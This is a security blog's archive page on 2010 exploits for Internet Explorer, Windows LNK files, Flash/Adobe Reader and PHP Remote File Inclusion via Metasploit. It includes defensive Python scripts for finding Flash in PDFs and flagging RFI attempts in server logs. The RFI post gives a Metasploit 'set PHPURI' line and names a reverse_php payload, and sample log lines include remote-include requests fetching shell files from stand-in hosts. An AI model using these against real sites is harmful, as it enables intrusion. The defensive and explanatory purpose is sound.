Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2010-3962, the confidential Internet Explorer 0day is confidential no longer

Two days ago we announced the discovery of a new “0day” targeting Internet Explorer 6, 7 and 8 on various Windows platforms. This “0day” was still confidential, as it was in the hands of Microsoft, Symantec and other computer security professionals.

In its blog, Microsoft gave details on the cause of the vulnerability: Internet Explorer reportedly has a memory-handling flaw when certain “CSS” style sheets are combined, and Microsoft named a vulnerable “DLL”.

No more information was needed for other researchers, who were not in the loop, to start investigating the cause in more detail in order to build a public “PoC”. Bingo! Less than a day after the official announcement of the vulnerability, a “PoC” was available on the Internet, turning a vulnerability that was originally very limited in impact into one that could affect millions of computers.

Below is a home-made video demonstrating how simple it is to exploit this vulnerability.

We also thought the fix for the vulnerability would be included in Microsoft’s normal update cycle, normally scheduled for the second Tuesday of every month. Unfortunately, the fix for this new vulnerability is not included in the advance notification of the updates planned for Tuesday 9 November.

We will most likely have to wait for an “out-of-band” update between 9 November and the next scheduled update, which will take place on 14 December.

In the meantime, we advise users to use Microsoft’s “Enhanced Mitigation Experience Toolkit v2.0” (EMET) to limit the reach of the vulnerability.

MS10-046 : Microsoft Windows Shell LNK Execution

Since 19 July, the Rapid7 Metasploit team has released an exploit module for the Windows Shell LNK vulnerability MSA-2286198, aka CVE-2010-2568. At the moment this vulnerability is not widely exploited, but the situation could change rapidly. As you surely know, SANS ISC has raised its threat warning level to yellow over this vulnerability.

We have successfully tested the exploit on a fully patched Windows XP Pro SP3.

Below is a video we made to demonstrate how easy it is to exploit this vulnerability with Metasploit.

[youtube rYrXDJfVLJ0]

CVE-2010-1297 : Adobe Flash Player newfunction Invalid Pointer Use

Since yesterday, the Rapid7 Metasploit team has released an exploit module for the Adobe Flash vulnerability APSA10-01, aka CVE-2010-1297.

The vulnerability affects Adobe Flash 10.0.45.2, 9.0.262, and earlier 10.0.x and 9.0.x versions for Windows, Macintosh, Linux and Solaris, but also Adobe Reader and Acrobat 9.3.2 and earlier 9.x versions for Windows, Macintosh and UNIX. This vulnerability could cause a crash or allow an attacker to take control of the affected system.

So, as I understand it, all the Internet could own all the Internet; a big party in prospect. Who is not using Flash?

The actual attack vector is a crafted PDF file embedding a vulnerable Flash animation. So if you download this kind of PDF from the Internet, or open emails with attached PDFs, and open them with Adobe Reader, you could be owned.
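Because the vector is a PDF carrying a Flash object, a useful defensive check on the mail gateway or on a suspicious attachment is to ask whether a PDF contains any Flash at all before it reaches Adobe Reader. The following Python script is an added example written for this post, not code from the original post or from Adobe or Rapid7. It looks for the PDF names used to embed Flash (the RichMedia annotation, the Flash instance subtype and the x-shockwave-flash embedded-file subtype, which I know from the PDF RichMedia extension; the post itself names none of them) and for the SWF file signatures, and it inflates FlateDecode streams first, because a naive grep on the raw file misses names hidden inside compressed object streams. The sample PDF is constructed inline and is deliberately minimal.

```python
import re
import zlib

# PDF names and content markers associated with embedded Flash (assumption: the
# post names none of these; they come from the PDF RichMedia extension).
FLASH_MARKERS = [
    b"/RichMedia",            # /Subtype /RichMedia annotation
    b"/Subtype /Flash",       # RichMediaInstance of type Flash
    b"/Subtype/Flash",
    b"x-shockwave-flash",     # embedded file subtype (escaped as application#2Fx-shockwave-flash)
    b"/SWF",
]
SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")   # uncompressed, zlib and LZMA SWF headers

# stream ... endstream bodies; the negative lookbehind keeps "endstream" from matching.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def inflate_streams(data):
    """Yield the body of every stream, decompressed when it is Flate-encoded."""
    for m in STREAM_RE.finditer(data):
        body = m.group(1)
        try:
            yield zlib.decompress(body)
        except zlib.error:
            yield body   # not zlib data (or corrupt): scan the raw body instead


def find_flash(data):
    """Return the sorted list of Flash indicators found in a PDF byte string."""
    found = set()
    chunks = [data] + list(inflate_streams(data))
    for chunk in chunks:
        for marker in FLASH_MARKERS:
            if marker in chunk:
                found.add(marker.decode())
        if chunk[:3] in SWF_SIGNATURES:
            found.add("swf-header")
    return sorted(found)


def build_sample_pdf(hide=True):
    """Constructed sample: a minimal PDF-like file with a RichMedia annotation and
    an embedded SWF.  With hide=True both live in Flate-compressed streams, so the
    names are invisible to a plain grep of the raw bytes."""
    annot = b"<< /Type /Annot /Subtype /RichMedia /RichMediaContent 5 0 R >>"
    swf = b"CWS\x0a" + b"\x00" * 28          # fake compressed-SWF header, constructed
    objstm = zlib.compress(annot) if hide else annot
    swf_stream = zlib.compress(swf) if hide else swf
    filt = b"/Filter /FlateDecode " if hide else b""
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n",
        b"4 0 obj << /Type /ObjStm " + filt + b"/Length %d >>\nstream\n" % len(objstm),
        objstm, b"\nendstream\nendobj\n",
        b"6 0 obj << /Type /EmbeddedFile " + filt + b"/Length %d >>\nstream\n" % len(swf_stream),
        swf_stream, b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%EOF\n",
    ])


if __name__ == "__main__":
    pdf = build_sample_pdf(hide=True)
    print("raw grep for /RichMedia:", b"/RichMedia" in pdf)   # False: hidden by compression
    print("scanner indicators:", find_flash(pdf))              # finds them anyway
```

A file that returns any indicator deserves to be opened in a reader without Flash support (or not at all) until Reader is updated; a real triage tool would also walk cross-reference streams and nested object streams, which this example does not.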

We have successfully tested the exploit with Adobe Reader 9.3.0 on Internet Explorer 8 and Safari 5.

No results with Google Chrome 5.0.375.70 or Firefox 3.5.9.

With Foxit Reader the PDF does not launch the Flash animation, so the exploit does not work.

Adobe has released updates for Flash Player, APSB10-14, so don’t hesitate to update your browser add-ons.

Below is a video we made to demonstrate how easy it is to exploit this vulnerability with Metasploit.

[youtube JW7B8aZsT88]

Playing with Remote File Inclusion in Metasploit

Exploiting Remote File Inclusion (RFI) through Metasploit is child’s play. On 29 January 2010, RSnake released a database of more than 2000 URLs vulnerable to Remote File Inclusion. This RFI database was compiled mainly from Milw0rm and OSVDB, and was integrated into Metasploit on 15 February 2010 by HD Moore, with the aim of feeding the already existing “php_include” exploit.

All the URLs in the database end with the “XXpathXX” placeholder, which is where the desired payload, for example “reverse_php“, will be executed.

If you don’t specify a specific RFI target, the RFI database is used by default. To focus on a specific URL, just set PHPURI to the desired URL and end it with “XXpathXX“. For example:

set PHPURI /index.php?COLOR=XXpathXX

When you check the HTTP server log you will see the related RFI attempts, but there is no way to distinguish an RFI bot scan from a Metasploit scan: by default, Metasploit sets no specific user agent for the “php_include” exploit. You can configure one in the exploit’s advanced options (show advanced). Setting a specific user agent is useful for writing dedicated IDS rules that identify which tool created these attempts, for example during a QA engagement.

The RFI database integrated into Metasploit is now 3 months old and no longer reflects the existing exploits, but you can easily create your own database and use it.
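To make the log side of this concrete, here is an added Python example (mine, not code from the post or from Metasploit) that reads Apache/nginx combined-format access log lines, flags requests whose query parameters point to a remote file (the signature of an RFI attempt, decoded so that percent-encoded URLs are not missed), and attributes each hit to an authorised scan or to an unknown bot by a user-agent marker. The marker string, the log lines and the hostnames are all constructed for this example; the allow-list of hosts whose URLs are legitimate parameter values is an assumption about your own application.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format (assumption: the post only says "HTTP server log").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# URL schemes PHP's include() will fetch remotely when allow_url_include is on.
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps")

# Constructed sample log lines (RFC 5737 documentation addresses, invented user agents).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Feb/2010:10:12:01 +0100] "GET /index.php?COLOR=http://198.51.100.9/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '203.0.113.7 - - [15/Feb/2010:10:12:05 +0100] "GET /index.php?COLOR=http%3A%2F%2F198.51.100.9%2Fshell.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.44 - - [15/Feb/2010:10:13:00 +0100] "GET /index.php?COLOR=blue HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.45 - - [15/Feb/2010:10:14:00 +0100] "GET /index.php?COLOR=http://www.example.com/theme.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [15/Feb/2010:10:15:00 +0100] "GET /index.php?COLOR=ftp://198.51.100.23/x.php HTTP/1.1" 500 120 "-" "Example-QA-Scanner/1.0 (authorised test)"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_parameters(target, local_hosts=()):
    """Return [(param, url)] for query values that name a remote file.

    parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    Hosts in local_hosts are your own and are not treated as remote includes."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = value.strip()
        if "://" not in value:
            continue
        u = urlsplit(value)
        if u.scheme.lower() in REMOTE_SCHEMES and u.hostname and u.hostname not in local_hosts:
            hits.append((name, value))
    return hits


def classify(line, scanner_ua_marker=None, local_hosts=()):
    """None if the line is unparsable or benign, else a record describing the RFI attempt."""
    rec = parse_line(line)
    if rec is None:
        return None
    hits = rfi_parameters(rec["target"], local_hosts)
    if not hits:
        return None
    # Attribution: only a user agent we set ourselves (Metasploit's advanced UserAgent
    # option) separates our own QA scan from a random RFI bot hitting the same URL.
    ours = bool(scanner_ua_marker) and scanner_ua_marker in rec["ua"]
    return {
        "ip": rec["ip"],
        "time": rec["ts"],
        "status": int(rec["status"]),
        "params": hits,
        "user_agent": rec["ua"],
        "source": "authorised-scan" if ours else "unknown/bot",
    }


def scan_log(lines, scanner_ua_marker=None, local_hosts=()):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [r for r in (classify(l, scanner_ua_marker, local_hosts) for l in lines) if r]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, scanner_ua_marker="Example-QA-Scanner",
                        local_hosts=("www.example.com",)):
        print(hit["time"], hit["ip"], hit["source"], hit["params"])
```

The same URL-in-parameter test is what an IDS rule would encode; the user-agent marker is the part you control, which is why the post recommends setting one before a scan. A 200 on a request whose parameter is a remote URL is the line to look at first, since it means the application fetched something.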

[youtube u6F-O32BR_Y]